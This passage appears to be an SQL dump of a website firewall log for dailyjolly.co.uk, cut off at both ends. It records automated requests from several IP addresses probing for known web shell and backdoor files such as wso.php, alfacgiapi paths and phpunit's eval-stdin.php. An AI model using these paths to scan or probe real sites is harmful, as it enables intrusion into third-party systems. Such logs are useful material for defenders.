'1PnJbpWMwcxgemT9As8E7iQU','','13|0|0|0|dailyjolly.co.uk/wp-commentin.php',0,13,0),('38.54.89.235',641096171,'',0,1673922432.1982,55,'2MPBsLJvxRd1cbVFhXGwUZ47','','19|0|0|0|dailyjolly.co.uk/ALFA_DATA/alfacgiapi/database.php',0,19,0),('38.54.89.235',641096171,'',0,1673922440.0879,55,'sOcxm1jqeu9VwItpvB0JMAkb','','19|0|0|0|dailyjolly.co.uk/alfacgiapi/database.php',0,19,0),('38.54.89.235',641096171,'',0,1673922447.6558,55,'XdxWkefG2Kg9cynL6OhiEQTq','','19|0|0|0|dailyjolly.co.uk/wordpress/ALFA_DATA/alfacgiapi/database.php',0,19,0),('38.54.89.235',641096171,'',0,1673922454.7691,55,'x7ENbnUCsOuTADXm6BLpfh9z','','19|0|0|0|dailyjolly.co.uk/wordpress/alfacgiapi/database.php',0,19,0),('38.54.89.235',641096171,'',0,1673922462.2486,55,'YjFL5cVwJu69kgTiXAePWn01','','19|0|0|0|dailyjolly.co.uk/site/ALFA_DATA/alfacgiapi/database.php',0,19,0),('38.54.89.235',641096171,'',0,1673922469.5059,55,'aUsnKiPoxrzTDGdR0teF5NZ2','','19|0|0|0|dailyjolly.co.uk/site/alfacgiapi/database.php',0,19,0),('38.54.89.235',641096171,'',0,1673922476.6902,55,'vt2XEfMVJp3hB1a5yALsiNwK','','19|0|0|0|dailyjolly.co.uk/wp-content/ALFA_DATA/alfacgiapi/database.php',0,19,0),('38.54.89.235',641096171,'',0,1673922484.6759,55,'GpXl0g5TPkyAFBrchoVOUx6H','','19|0|0|0|dailyjolly.co.uk/wp-content/alfacgiapi/database.php',0,19,0),('38.54.89.235',641096171,'',0,1673922494.3134,55,'Qxc0Ai9KOuEdrnohkDJRI1lZ','','19|0|0|0|dailyjolly.co.uk/wp-includes/ALFA_DATA/alfacgiapi/database.php',0,19,0),('38.54.89.235',641096171,'',0,1673922501.4553,55,'wy5DpeU3sE4mJOBNz1CkvrKL','','19|0|0|0|dailyjolly.co.uk/wp-includes/alfacgiapi/database.php',0,19,0),('38.54.89.235',641096171,'',0,1673922508.4791,55,'wutNszD7riHQnE6o49KZyfhP','','19|0|0|0|dailyjolly.co.uk/wp/wp-includes/ALFA_DATA/alfacgiapi/database.php',0,19,0),('38.54.89.235',641096171,'',0,1673922515.8752,55,'QKisHxty1pCbdZaqfuwXN8jW','','19|0|0|0|dailyjolly.co.uk/wp/wp-includes/alfacgiapi/database.php',0,19,0),('38.54.89.235',641096171,'',0,1673922523.1082,55,'4PWqzFKjawMfeoGUDsxlvbO7','','19|0|0|0|dailyjolly.co.uk/wordpress/wp-includes/ALFA_DATA/alfacgiapi/database.php',0,19,0),('38.54.89.235',641096171,'',0,1673922530.8566,55,'LtJyOBFNQp4X2ZDYRx7Wlicf','','19|0|0|0|dailyjolly.co.uk/wordpress/wp-includes/alfacgiapi/database.php',0,19,0),('38.54.89.235',641096171,'',0,1673922537.8384,55,'arVWY9TvUyO0uMkeHtXl13Nb','','19|0|0|0|dailyjolly.co.uk/blog/ALFA_DATA/alfacgiapi/database.php',0,19,0),('38.54.89.235',641096171,'',0,1673922544.8019,55,'7gW3rbvxuYSCFJEMqLGOo1K4','','19|0|0|0|dailyjolly.co.uk/blog/alfacgiapi/database.php',0,19,0),('38.54.89.235',641096171,'',0,1673922552.2225,55,'dw3FLTPk82q74SbJHa9vsfne','','19|0|0|0|dailyjolly.co.uk/admin/controller/extension/ALFA_DATA/alfacgiapi/database.php',0,19,0),('38.54.89.235',641096171,'',0,1673922559.3329,55,'ZrBSR9Hjo3vQgGc8p24ly6CX','','19|0|0|0|dailyjolly.co.uk/admin/controller/extension/alfacgiapi/database.php',0,19,0),('20.172.244.167',346879143,'',0,1673922565.4864,55,'RhswqiHdQUjxImOF59Jnebtu','','19|0|0|0|www.dailyjolly.co.uk/new_license.php',0,19,0),('38.54.89.235',641096171,'',0,1673922566.2750,55,'WU2PJNHE3wTz7gCS1DtGQ9bs','','19|0|0|0|dailyjolly.co.uk/admin/controller/ALFA_DATA/alfacgiapi/database.php',0,19,0),('38.54.89.235',641096171,'',0,1673922573.5898,55,'51X9LqWkEhxsyzlQrRgjYZdJ','','19|0|0|0|dailyjolly.co.uk/admin/controller/alfacgiapi/database.php',0,19,0),('38.54.89.235',641096171,'',0,1673922581.3670,55,'gEsm8i9G4dxBFjCu0vV6eHOU','','19|0|0|0|dailyjolly.co.uk/admin/ALFA_DATA/alfacgiapi/database.php',0,19,0),('38.54.89.235',641096171,'',0,1673922588.8006,55,'8TupmC0U5Mbj9KlN6YJQAI4W','','19|0|0|0|dailyjolly.co.uk/admin/alfacgiapi/database.php',0,19,0),('38.54.89.235',641096171,'',0,1673922590.3279,55,'RdTM16CKLtGajnUcXwb85HZg','','19|0|0|0|dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',0,19,0),('38.54.89.235',641096171,'',0,1673922591.8275,55,'h5bAmtkCpzXIoL8PMTxQ02sB','','19|0|0|0|dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/database.php',0,19,0),('38.54.89.235',641096171,'',0,1673922593.2564,55,'n2aHcCXQy3RuzpNbwGhqOoAx','','19|0|0|0|dailyjolly.co.uk/cgi-bin/mt/mt-xmlrpc.cgi',0,19,0),('38.54.89.235',641096171,'',0,1673922594.7294,55,'rFZAf5mHMlW7g23GuaJwiOEj','','19|0|0|0|dailyjolly.co.uk/cgi-bin/DeathShop.php',0,19,0),('38.54.89.235',641096171,'',0,1673922596.1776,55,'yaxqpIC4Q3JBbVimP5gtcj7S','','19|0|0|0|dailyjolly.co.uk/mt/mt-xmlrpc.cgi',0,19,0),('38.54.89.235',641096171,'',0,1673922597.6195,55,'GmrWtwqK2OCSxs04AzFY7N3B','','19|0|0|0|dailyjolly.co.uk/DeathShop.php',0,19,0),('38.54.89.235',641096171,'',0,1673922599.0566,55,'BF0w1fPevrLM6l4R2iq9CTo8','','19|0|0|0|dailyjolly.co.uk/cgi-bin/mt-xmlrpc.cgi',0,19,0),('38.54.89.235',641096171,'',0,1673922600.5188,55,'6Qfl80jqRpdC7XoDc3EUPWxt','','19|0|0|0|dailyjolly.co.uk/DeathShop.php',0,19,0),('38.54.89.235',641096171,'',0,1673922602.0477,55,'pGiaswVBkfmyocLndFqIh65r','','19|0|0|0|dailyjolly.co.uk/mt-xmlrpc.cgi',0,19,0),('38.54.89.235',641096171,'',0,1673922603.5152,55,'OPDaoqYxM02ZR9Jem38FLWsS','','19|0|0|0|dailyjolly.co.uk/DeathShop.php',0,19,0),('38.54.89.235',641096171,'',0,1673922605.0039,55,'qYoBM7XvpF1ZlmNfI2iPW84U','','19|0|0|0|dailyjolly.co.uk/cgi-bin/MT/mt-xmlrpc.cgi',0,19,0),('38.54.89.235',641096171,'',0,1673922606.4447,55,'KqtO6Iv8SnpMPTa3GLeC7Vwo','','19|0|0|0|dailyjolly.co.uk/cgi-bin/DeathShop.php',0,19,0),('38.54.89.235',641096171,'',0,1673922607.9076,55,'sA9moEG3yQfPeiVb08c6MHCL','','19|0|0|0|dailyjolly.co.uk/MT/mt-xmlrpc.cgi',0,19,0),('38.54.89.235',641096171,'',0,1673922609.3217,55,'EhwYlkygDXOd5FG6ReCJtizV','','19|0|0|0|dailyjolly.co.uk/DeathShop.php',0,19,0),('38.54.89.235',641096171,'',0,1673922610.7116,55,'FqoUiDfjAw67kx2rMlg1Tv98','','19|0|0|0|dailyjolly.co.uk/mtos/mt-xmlrpc.cgi',0,19,0),('38.54.89.235',641096171,'',0,1673922612.1426,55,'vBItgzeoDyANqr8EaciJF4kX','','19|0|0|0|dailyjolly.co.uk/DeathShop.php',0,19,0),('38.54.89.235',641096171,'',0,1673922613.5516,55,'Uy31OpZ4nG2dvL9W8JwKhECP','','19|0|0|0|dailyjolly.co.uk/cms/mt-xmlrpc.cgi',0,19,0),('38.54.89.235',641096171,'',0,1673922615.0248,55,'Ycfab1iSMZvjx5zIh74pAq3K','','19|0|0|0|dailyjolly.co.uk/DeathShop.php',0,19,0),('38.54.89.235',641096171,'',0,1673922616.8361,55,'k9nvOEBtjeZVsw2XC75WDJ3R','','19|0|0|0|dailyjolly.co.uk/blog/mt-xmlrpc.cgi',0,19,0),('38.54.89.235',641096171,'',0,1673922618.3634,55,'YAk4yEraPljU2X5g0Rmp9noF','','19|0|0|0|dailyjolly.co.uk/DeathShop.php',0,19,0),('38.54.89.235',641096171,'',0,1673922619.8763,55,'NsYiophOqB5IJc08rmegVyz3','','19|0|0|0|dailyjolly.co.uk/cgi/mt-xmlrpc.cgi',0,19,0),('38.54.89.235',641096171,'',0,1673922621.3769,55,'mig9ARFMjHnPV7T5QXzxeLCo','','19|0|0|0|dailyjolly.co.uk/DeathShop.php',0,19,0),('38.54.89.235',641096171,'',0,1673922622.8460,100,'CGOQp9z1H58lgXr7ysxvSAdU','','13|0|0|0|dailyjolly.co.uk/wp-content/themes/seotheme/db.php',0,13,0),('38.54.89.235',641096171,'',0,1673922624.3062,55,'IBHEdaYoyVU3LRuQnG12tpJM','','19|0|0|0|dailyjolly.co.uk/wp-content/themes/seotheme/mar.php',0,19,0),('38.54.89.235',641096171,'',0,1673922626.0318,100,'4N18u3yGilgkAdE0TFOhfLUM','','13|0|0|0|dailyjolly.co.uk/wp-content/themes/pridmag/db.php',0,13,0),('38.54.89.235',641096171,'',0,1673922627.4816,55,'254iW3DMoVReTShln1EwsujZ','','19|0|0|0|dailyjolly.co.uk/wp-content/themes/pridmag/mar.php',0,19,0),('38.54.89.235',641096171,'',0,1673922628.9453,55,'Nc3YgvHeUfFpPWEC6y7u8sXr','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/ubh/up.php',0,19,0),('38.54.89.235',641096171,'',0,1673922630.3956,100,'TQ2RKst9lSOwmkBNYErMdUWA','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/apikey/apikey.php',0,13,0),('38.54.89.235',641096171,'',0,1673922631.9148,55,'b6mXepE4KusMjJwHCzi2VhR5','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php',0,19,0),('38.54.89.235',641096171,'',0,1673922633.3967,55,'31WB0TUJgpC6vwF8aryjKQ9Y','','19|0|0|0|dailyjolly.co.uk/wp-content/themes/wp-pridmag/init.php',0,19,0),('38.54.89.235',641096171,'',0,1673922634.8611,100,'2utfBKY4V31AXviDCHI8kLgP','','13|0|0|0|dailyjolly.co.uk/wp-content/themes/gaukingo/db.php',0,13,0),('38.54.89.235',641096171,'',0,1673922639.6874,100,'pzuQ6kDjxrwCfqJnodBsZvMc','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php',0,13,0),('38.54.89.235',641096171,'',0,1673922643.8236,55,'s20vZCgd9NxaetBnqRIPVo3W','','19|0|0|0|dailyjolly.co.uk/wp/wp-admin/install.php',0,19,0),('38.54.89.235',641096171,'',0,1673922645.5057,55,'3rEVkbyFjdwRaPQu1CslMzN2','','19|0|0|0|dailyjolly.co.uk/wp/wp-admin/setup-config.php',0,19,0),('38.54.89.235',641096171,'',0,1673922646.9696,55,'IXdxyDOKVzCMN5sJTb4mGoYH','','19|0|0|0|dailyjolly.co.uk/new/wp-admin/install.php',0,19,0),('38.54.89.235',641096171,'',0,1673922648.6716,55,'ZLFo13fQRvWsJlhNx6kqnVK8','','19|0|0|0|dailyjolly.co.uk/new/wp-admin/setup-config.php',0,19,0),('38.54.89.235',641096171,'',0,1673922650.6680,55,'mG86fZXR9QNeaCE2PBOw0zIH','','19|0|0|0|dailyjolly.co.uk/old/wp-admin/install.php',0,19,0),('38.54.89.235',641096171,'',0,1673922652.3705,55,'1Ht5J9IjTaEvSWze3Lr4o6ND','','19|0|0|0|dailyjolly.co.uk/old/wp-admin/setup-config.php',0,19,0),('38.54.89.235',641096171,'',0,1673922653.8473,55,'57VTuBUwO69Wby3pqFAlLMYJ','','19|0|0|0|dailyjolly.co.uk/wordpress/wp-admin/install.php',0,19,0),('38.54.89.235',641096171,'',0,1673922655.3397,55,'rSq1zBID6y8QZ9GjtJKWk045','','19|0|0|0|dailyjolly.co.uk/wordpress/wp-admin/setup-config.php',0,19,0),('38.54.89.235',641096171,'',0,1673922656.8015,55,'L8DFx0K7Bqhdwc5sSORTezmp','','19|0|0|0|dailyjolly.co.uk/test/wp-admin/install.php',0,19,0),('38.54.89.235',641096171,'',0,1673922658.3279,55,'1Q7YdAxGDhJCjeMcuyom9RLr','','19|0|0|0|dailyjolly.co.uk/test/wp-admin/setup-config.php',0,19,0),('38.54.89.235',641096171,'',0,1673922659.7395,55,'3WPxY84dmjEIklzcM1F9SuAt','','19|0|0|0|dailyjolly.co.uk/blog/wp-admin/install.php',0,19,0),('38.54.89.235',641096171,'',0,1673922661.2850,55,'BgzN7s0nORFyqUW5rdSviGZX','','19|0|0|0|dailyjolly.co.uk/blog/wp-admin/setup-config.php',0,19,0),('38.54.89.235',641096171,'',0,1673922662.7177,55,'pqojvz0SkDra9XPNIE1YO4Fu','','19|0|0|0|dailyjolly.co.uk/cms/wp-admin/install.php',0,19,0),('38.54.89.235',641096171,'',0,1673922664.2388,55,'FnJkti6P1hIERSGTVCw8LK3p','','19|0|0|0|dailyjolly.co.uk/cms/wp-admin/setup-config.php',0,19,0),('38.54.89.235',641096171,'',0,1673922665.6348,55,'jBGeDOpT3y80aYVMEgroSwki','','19|0|0|0|dailyjolly.co.uk/web/wp-admin/install.php',0,19,0),('38.54.89.235',641096171,'',0,1673922667.0570,55,'rzQ5R8E7XkFh3JnNeUiyldbM','','19|0|0|0|dailyjolly.co.uk/web/wp-admin/setup-config.php',0,19,0),('38.54.89.235',641096171,'',0,1673922668.4694,55,'9w8HdJ7yZgjez56kNtMITiUv','','19|0|0|0|dailyjolly.co.uk/backup/wp-admin/install.php',0,19,0),('38.54.89.235',641096171,'',0,1673922670.0028,55,'Dz7fZuyhSEW2n3RqXOpK4gYo','','19|0|0|0|dailyjolly.co.uk/backup/wp-admin/setup-config.php',0,19,0),('38.54.89.235',641096171,'',0,1673922671.5118,55,'jL3Xf2qmQnxZlKvW4sE5kCAu','','19|0|0|0|dailyjolly.co.uk/site/wp-admin/install.php',0,19,0),('38.54.89.235',641096171,'',0,1673922673.1030,55,'mYuKxOEFJnhC16pqSRj3DU2H','','19|0|0|0|dailyjolly.co.uk/site/wp-admin/setup-config.php',0,19,0),('38.54.89.235',641096171,'',0,1673922674.5771,55,'qE6wlk48hz5yTGNHIiQ2DnCu','','19|0|0|0|dailyjolly.co.uk/oldsite/wp-admin/install.php',0,19,0),('38.54.89.235',641096171,'',0,1673922676.3592,55,'Uj3Fwf0xloIZtKHX7Tp2nDu1','','19|0|0|0|dailyjolly.co.uk/oldsite/wp-admin/setup-config.php',0,19,0),('38.54.89.235',641096171,'',0,1673922677.8893,55,'Z2CDnhrV8QsLUHExwb7SpRtj','','19|0|0|0|dailyjolly.co.uk/Paiement/wp-admin/install.php',0,19,0),('38.54.89.235',641096171,'',0,1673922679.3821,55,'uEAZ2y6VJohIzW1KYabr0pLT','','19|0|0|0|dailyjolly.co.uk/Paiement/wp-admin/setup-config.php',0,19,0),('38.54.89.235',641096171,'',0,1673922680.9878,55,'UzcB9qONEi7hgdvPMaATjpoW','','19|0|0|0|dailyjolly.co.uk/sandbox/wp-admin/install.php',0,19,0),('38.54.89.235',641096171,'',0,1673922682.7983,55,'GJWg19MfUdH2a7FzyR48svh5','','19|0|0|0|dailyjolly.co.uk/sandbox/wp-admin/setup-config.php',0,19,0),('20.172.244.167',346879143,'',0,1673922767.7098,55,'z2fikvm7SPlcXg0HIBrOty8n','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/theme-configurator/mini.php',0,19,0),('20.172.244.167',346879143,'',0,1673922914.1158,55,'lMy05tXKu9iA21JUpZoSYRkG','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/widget-logic/mini.php',0,19,0),('20.172.244.167',346879143,'',0,1673923139.4807,55,'i1GspYIc83ayoRmSdBVUKhtb','','19|0|0|0|www.dailyjolly.co.uk/wso.php',0,19,0),('20.172.244.167',346879143,'',0,1673923257.5767,55,'CopUbVDEIFKqgP3krJ2Ri0Nd','','19|0|0|0|www.dailyjolly.co.uk/modules/modules/modules.php',0,19,0),('20.172.244.167',346879143,'',0,1673923374.8642,55,'tSOGJDmAwcagYd2n85ykbR6I','','19|0|0|0|www.dailyjolly.co.uk/modules/mod_simplefileuploadv1.3/elements/Clean.php',0,19,0),('20.172.244.167',346879143,'',0,1673923525.5137,55,'sNIMd9eA0jyk5XvbR2VKGHuq','','19|0|0|0|www.dailyjolly.co.uk/modules/mod_simplefileuploadv1.3/elements/udd.php',0,19,0),('20.172.244.167',346879143,'',0,1673923624.0670,55,'HvDyJX7Ph381jRgbS0VKadnG','','19|0|0|0|www.dailyjolly.co.uk/libraries/joomla/css.php',0,19,0),('20.172.244.167',346879143,'',0,1673923695.4108,100,'0EIt2z61HcrkVwyhLm4bQC8K','','13|0|0|0|www.dailyjolly.co.uk/libraries/joomla/jmails.php',0,13,0),('20.172.244.167',346879143,'',0,1673923766.8292,100,'02WHVDJuvx6Po7ITdQBOiS3e','','13|0|0|0|www.dailyjolly.co.uk/libraries/joomla/jmail.php',0,13,0),('20.172.244.167',346879143,'',0,1673923841.1717,55,'9txAZKYkgWQfOH5V3Fp1Iehm','','19|0|0|0|www.dailyjolly.co.uk/images/vuln.php',0,19,0),('20.172.244.167',346879143,'',0,1673923896.7795,55,'tnu0S6ewpIaZlXCFzrNGOYgv','','19|0|0|0|www.dailyjolly.co.uk/tmp/vuln.php',0,19,0),('20.172.244.167',346879143,'',0,1673923943.4958,55,'SXPbZ8dYFpAmkMG4lehr2LV5','','19|0|0|0|www.dailyjolly.co.uk/XxX.php',0,19,0),('20.172.244.167',346879143,'',0,1673924184.8719,55,'E2VXf13M5JDcHPweyCYZknaN','','19|0|0|0|www.dailyjolly.co.uk/olux.php',0,19,0),('20.244.36.78',351544398,'',0,1673924221.6748,55,'kTZiXRVYWbvQz1UMeyN5rFLo','','19|0|0|0|www.dailyjolly.co.uk/1index.php',0,19,0),('20.244.36.78',351544398,'',0,1673924225.0470,55,'rtbCahU2fgKdpVZRv0MYD935','','19|0|0|0|www.dailyjolly.co.uk/wp_wrong_datlib.php',0,19,0),('20.244.36.78',351544398,'',0,1673924226.2071,55,'Sc0eITuEG4mdLBipAUrHYntQ','','19|0|0|0|www.dailyjolly.co.uk/beence.php',0,19,0),('20.244.36.78',351544398,'',0,1673924230.8818,55,'AmoEUbgR9tzNeCOGhMdV4D0c','','19|0|0|0|www.dailyjolly.co.uk/export.php',0,19,0),('20.244.36.78',351544398,'',0,1673924231.4076,55,'aHc3EpBGJbt549XoqW2f0OVi','','19|0|0|0|www.dailyjolly.co.uk/wp-content/export.php',0,19,0),('20.244.36.78',351544398,'',0,1673924231.4934,10,'aHc3EpBGJbt549XoqW2f0OVi','','707|0|0|0|www.dailyjolly.co.uk/wp-content/export.php',0,707,0),('20.244.36.78',351544398,'',0,1673924233.6215,55,'zwTkIxgnBmZMpF7svP9WatU4','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-atom.php',0,19,0),('20.244.36.78',351544398,'',0,1673924234.6587,55,'uTSCmp7O2a6VfHUAdKZqchWe','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/images/css.php',0,19,0),('20.244.36.78',351544398,'',0,1673924235.1527,55,'yVvNd4pkqKsSOxzl5nFo2aHt','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/css.php',0,19,0),('20.244.36.78',351544398,'',0,1673924236.2157,55,'d8FOPxlnkpX0CTSbUNL3D9J2','','19|0|0|0|www.dailyjolly.co.uk/defau1t.php',0,19,0),('20.244.36.78',351544398,'',0,1673924237.3633,55,'iCWag0p97jewt3HDXoky14Nl','','19|0|0|0|www.dailyjolly.co.uk/moduless.php',0,19,0),('20.244.36.78',351544398,'',0,1673924246.4621,100,'fmN7qxtouI2cyKn1GQO93Upg','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/wpconfig.bak.php',0,13,0),('20.244.36.78',351544398,'',0,1673924251.6391,55,'8tzW10vcExSwO7bmDGiZ9Uu4','','19|0|0|0|www.dailyjolly.co.uk/archives.php',0,19,0),('20.244.36.78',351544398,'',0,1673924252.9863,55,'ycFfGW8rHKeNnhQJ4u9EBDzv','','19|0|0|0|www.dailyjolly.co.uk/defau11.php',0,19,0),('20.172.244.167',346879143,'',0,1673924910.1358,55,'aPeL2IG6Jm8C0QS7Ns9cOyFo','','19|0|0|0|www.dailyjolly.co.uk/theme.php',0,19,0),('46.21.198.186',773179066,'',0,1673927413.5778,55,'UTDM06xFbEOpCh845n2tsyVg','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/core-stab/index.php',0,19,0),('185.185.80.221',3115929821,'',0,1673927413.7191,55,'ejwPWTA0SUdOyCa6RQ5uB4po','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/core-stab/index.php',0,19,0),('46.21.198.186',773179066,'',0,1673927415.3114,55,'ynqS0dlDQZ6485ANhUEHBfxR','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/versions.php',0,19,0),('185.185.80.221',3115929821,'',0,1673927415.5638,55,'S9jAObFJIsC8v5oT4dBx2mNf','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/versions.php',0,19,0),('46.21.198.186',773179066,'',0,1673927415.8826,55,'aIGjDZeSfLWhbo7HcBk10Kiv','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/assets/load.php',0,19,0),('185.185.80.221',3115929821,'',0,1673927415.9392,55,'i1Inv8p4t3VeJGuMA6BKbSlP','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/assets/load.php',0,19,0),('46.21.198.186',773179066,'',0,1673927416.8591,55,'2YWo09KBQa5gV3PE6hDCFd8v','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/walfs/index.php',0,19,0),('185.185.80.221',3115929821,'',0,1673927416.9196,55,'EH4rIn2GFJh0Aqf6iPcyvKRe','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/walfs/index.php',0,19,0),('46.21.198.186',773179066,'',0,1673927417.1761,55,'jSYoEmRPrN9AIT0OvKXthkW7','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/fonts/load.php',0,19,0),('46.21.198.186',773179066,'',0,1673927417.2671,10,'jSYoEmRPrN9AIT0OvKXthkW7','','707|0|0|0|www.dailyjolly.co.uk/wp-includes/fonts/load.php',0,707,0),('185.185.80.221',3115929821,'',0,1673927417.4436,55,'VI0RWweLE3DjGaSx7qXApQKt','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/fonts/load.php',0,19,0),('185.185.80.221',3115929821,'',0,1673927417.4725,10,'VI0RWweLE3DjGaSx7qXApQKt','','707|0|0|0|www.dailyjolly.co.uk/wp-includes/fonts/load.php',0,707,0),('46.21.198.186',773179066,'',0,1673927417.5217,55,'FaO81meox0SA6DUd9wyGlJRg','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/js/thickbox/themes.php',0,19,0),('185.185.80.221',3115929821,'',0,1673927417.7031,55,'GkHjPTf6pXyvoAdUKs3wNbcF','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/js/thickbox/themes.php',0,19,0),('184.75.221.146',3091979666,'',0,1673937818.2682,55,'PnVIkypC3em8jJiR0H6bsoLM','','19|0|0|0|dailyjolly.co.uk/wp-admin/style.php',0,19,0),('184.75.221.146',3091979666,'',0,1673937818.2683,55,'buaZz5jgRWSBsrqv6d8wUMHT','','19|0|0|0|dailyjolly.co.uk/style.php',0,19,0),('20.172.244.167',346879143,'',0,1673939256.7133,55,'G2VgcCBT4aIdW91p7vew6OQL','','19|0|0|0|www.dailyjolly.co.uk/wp-content/admin.php',0,19,0),('20.172.244.167',346879143,'',0,1673939258.0821,55,'oIz1tK7ybUq3PsjXinCJG0Sc','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php',0,19,0),('3.70.167.47',54961967,'',0,1673949955.4797,55,'PmJF2C3ySqh1oTY0iAeGRx9B','','19|0|0|0|dailyjolly.co.uk/sym.php',0,19,0),('3.70.167.47',54961967,'',0,1673949955.5543,55,'uAdYNVkOb5zw7m0QnPGCpD43','','19|0|0|0|dailyjolly.co.uk/mar.php',0,19,0),('3.70.167.47',54961967,'',0,1673949955.6301,55,'BfR9UbaclEuerM0P4v2J7k1p','','19|0|0|0|dailyjolly.co.uk/radio.php',0,19,0),('3.70.167.47',54961967,'',0,1673949955.7161,55,'7xybuclDWAwGBnofZYOMPUH0','','19|0|0|0|dailyjolly.co.uk/stindex.php',0,19,0),('3.70.167.47',54961967,'',0,1673949956.4582,55,'cLMV5ZrECxwgF2Xz8uIan7ST','','19|0|0|0|dailyjolly.co.uk/3.php',0,19,0),('3.70.167.47',54961967,'',0,1673949956.4955,10,'cLMV5ZrECxwgF2Xz8uIan7ST','','707|0|0|0|dailyjolly.co.uk/3.php',0,707,0),('3.70.167.47',54961967,'',0,1673949956.5698,55,'1dmzEHqLRU8D2bkjlMWfisYA','','19|0|0|0|dailyjolly.co.uk/mar.php',0,19,0),('3.70.167.47',54961967,'',0,1673949956.5744,55,'q4SZrcAIyj7NeUo9HhF0bu3V','','19|0|0|0|dailyjolly.co.uk/sym.php',0,19,0),('3.70.167.47',54961967,'',0,1673949956.6229,55,'yeTnlVd1jDbpRvSQH0Nwas4r','','19|0|0|0|dailyjolly.co.uk/radio.php',0,19,0),('3.70.167.47',54961967,'',0,1673949956.7892,55,'WMdlRYGNI4zeULu5FZVBEq2x','','19|0|0|0|dailyjolly.co.uk/stindex.php',0,19,0),('3.70.167.47',54961967,'',0,1673949958.4872,55,'xZaXN40LwAV9DYjhlc5n2HeW','','19|0|0|0|dailyjolly.co.uk/3.php',0,19,0),('3.70.167.47',54961967,'',0,1673949961.9492,55,'u8vWzmhaRGoYSNIdFJZHAKn4','','19|0|0|0|dailyjolly.co.uk/o.php',0,19,0),('3.70.167.47',54961967,'',0,1673949962.4060,55,'YZEdCyWvnHis07cbtoIeLRQf','','19|0|0|0|dailyjolly.co.uk/o.php',0,19,0),('3.70.167.47',54961967,'',0,1673950008.1645,55,'Wjmva8x7lHNFywuK4LpJXIds','','19|0|0|0|dailyjolly.co.uk/shell.php',0,19,0),('3.70.167.47',54961967,'',0,1673950008.9553,55,'5eAFDUdqxoKEYS46J3QcTuCj','','19|0|0|0|dailyjolly.co.uk/wp-info.php',0,19,0),('3.70.167.47',54961967,'',0,1673950009.1219,55,'0y7wWuXtQzAOVRZTBbIKlh5g','','19|0|0|0|dailyjolly.co.uk/shell.php',0,19,0),('3.70.167.47',54961967,'',0,1673950010.7631,55,'pAOK07TdDL2Eam4Jjo83N9e6','','19|0|0|0|dailyjolly.co.uk/wp-info.php',0,19,0),('3.70.167.47',54961967,'',0,1673950068.7729,55,'dRPOFvrUaZEctX9AkmlsC7HW','','19|0|0|0|dailyjolly.co.uk/wp-admin/maint/about.php',0,19,0),('3.70.167.47',54961967,'',0,1673950069.0925,55,'e8N1ZV5COpuFPUz0HsGBgdIm','','19|0|0|0|dailyjolly.co.uk/sym403.php',0,19,0),('3.70.167.47',54961967,'',0,1673950069.7199,55,'EzuDhYfU9nxCtQjHsIA3ToNr','','19|0|0|0|dailyjolly.co.uk/sym403.php',0,19,0),('3.70.167.47',54961967,'',0,1673950069.8995,55,'ukK8YhoTBI4gzaiQ2mr17Dcb','','19|0|0|0|dailyjolly.co.uk/wp-admin/maint/about.php',0,19,0),('3.70.167.47',54961967,'',0,1673950136.8364,55,'69vS4Yb8cmVMLlwinqDNzJOA','','19|0|0|0|dailyjolly.co.uk/s.php',0,19,0),('3.70.167.47',54961967,'',0,1673950138.8264,55,'0ok9Ibs72T1E3FzXPAJfSUrq','','19|0|0|0|dailyjolly.co.uk/s.php',0,19,0),('3.70.167.47',54961967,'',0,1673950180.1688,55,'AnjlBUZow1hCs853mrK9fVQu','','19|0|0|0|dailyjolly.co.uk/0.php',0,19,0),('3.70.167.47',54961967,'',0,1673950180.1994,55,'iA2GLvTREn30Dh94MopFImCx','','19|0|0|0|dailyjolly.co.uk/0byte.php',0,19,0),('3.70.167.47',54961967,'',0,1673950180.7400,55,'I06415aEyxsfkDQ3SUolYqBz','','19|0|0|0|dailyjolly.co.uk/u.php',0,19,0),('3.70.167.47',54961967,'',0,1673950180.9940,55,'Qm7bNDCei4U0Axn9RWhpruSZ','','19|0|0|0|dailyjolly.co.uk/0.php',0,19,0),('3.70.167.47',54961967,'',0,1673950181.2875,55,'jH8AXmgq2PZz6c3iFNGT7ku5','','19|0|0|0|dailyjolly.co.uk/r.php',0,19,0),('3.70.167.47',54961967,'',0,1673950181.7444,55,'RU1YBdsn2b9KToPMepXcqIOV','','19|0|0|0|dailyjolly.co.uk/0byte.php',0,19,0),('3.70.167.47',54961967,'',0,1673950181.8390,55,'DL9Uh2vNwoZRiYcPMBHu0E6y','','19|0|0|0|dailyjolly.co.uk/wp-wso.php',0,19,0),('3.70.167.47',54961967,'',0,1673950182.2900,55,'SaDc6CW0uqlBN3EIzpjyUkwO','','19|0|0|0|dailyjolly.co.uk/r.php',0,19,0),('3.70.167.47',54961967,'',0,1673950182.3962,55,'yKZiFwQCGzLUxnMdpY3uh2kt','','19|0|0|0|dailyjolly.co.uk/wp-wso.php',0,19,0),('3.70.167.47',54961967,'',0,1673950182.4454,55,'EMiAI1cFkfo3KYrG9s8gDQHC','','19|0|0|0|dailyjolly.co.uk/u.php',0,19,0),('3.70.167.47',54961967,'',0,1673950182.4782,55,'oHX3lf2Q9qZjweDn